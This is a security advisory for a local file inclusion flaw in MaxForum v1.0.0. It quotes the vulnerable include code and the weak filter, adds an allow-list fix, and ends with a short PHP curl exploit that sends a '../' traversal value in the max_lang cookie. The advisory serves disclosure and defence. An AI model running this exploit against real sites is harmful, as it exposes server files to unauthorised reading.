MaxForum Local File Inclusion Exploit

Summary

MaxForum v1.0.0 suffers from a local file inclusion vulnerability.

Credit:

The information has been provided by ahwak2000.


Details

Vulnerable Systems:
 * MaxForum v1.0.0

In file /MaxForum/includes/forums/warn_popup.php (lines 100-105):

if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){
// $board_lang is taken from the max_lang cookie
$board_lang = escape_string($_COOKIE['max_lang']);
}

// the cookie value becomes part of the included path
@include "../../language/$board_lang";
@include "../../language/$board_lang.php";

-------------
In file /MaxForum/libs/php/functions.php:

function escape_string($string) {

$string = addslashes($string);

$string = htmlspecialchars($string);
return $string;
}
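
Why the filter above does not stop the inclusion, and one way to close the hole, as an added example (not MaxForum's code or a vendor patch): addslashes() and htmlspecialchars() leave "." and "/" untouched, so a traversal value passes through escape_string() unchanged. The hypothetical resolve_language_file() accepts only the name of a .php file that already exists in the language directory; the directory layout and cookie values are constructed for the demo.

```php
<?php
// Added example, not MaxForum code: resolve_language_file() and the
// sample directory layout below are hypothetical.

// The page's filter, reproduced to show what it leaves untouched.
function escape_string($string) {
    return htmlspecialchars(addslashes($string));
}

// Map a cookie value to a language file, or fall back to the default.
function resolve_language_file(string $langDir, ?string $requested, string $default = 'english'): string
{
    $base = realpath($langDir);
    if ($base === false) {
        throw new RuntimeException('language directory missing');
    }
    // Allow-list: only names of .php files that exist in the directory.
    $allowed = [];
    foreach (glob($base . '/*.php') ?: [] as $path) {
        $allowed[basename($path, '.php')] = $path;
    }
    // Accept a bare token only: no dots, slashes, NUL bytes or wrappers.
    $ok = is_string($requested)
        && preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested) === 1
        && isset($allowed[$requested]);
    $name = $ok ? $requested : $default;
    if (!isset($allowed[$name])) {
        throw new RuntimeException('default language file missing');
    }
    return $allowed[$name];
}

// Constructed layout: <tmp>/gpl.txt beside <tmp>/language/{english,french}.php
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($root . '/language', 0700, true);
file_put_contents($root . '/gpl.txt', 'licence text');
file_put_contents($root . '/language/english.php', '<?php $lang = "en";');
file_put_contents($root . '/language/french.php', '<?php $lang = "fr";');

// Constructed cookie values: one valid, three that must fall back.
foreach (['french', '../gpl.txt', 'french.php', ''] as $cookie) {
    printf("cookie=%-14s filtered=%-14s resolved=%s\n",
        var_export($cookie, true),
        var_export(escape_string($cookie), true),
        basename(resolve_language_file($root . '/language', $cookie)));
}
// Remove the constructed files again.
array_map('unlink', glob($root . '/language/*'));
unlink($root . '/gpl.txt'); rmdir($root . '/language'); rmdir($root);
```

In warn_popup.php the two @include lines would be replaced by a single include of the path this function returns.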

Exploit:

<?php
$url='http://site.com/MaxForum/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'/includes/forums/warn_popup.php');
curl_setopt($ch, CURLOPT_COOKIE, 'max_lang=../gpl.txt'); // <-- edit
$buffer = curl_exec($ch);
?>

#end

Disclosure Timeline:
Published: 2012-08-15
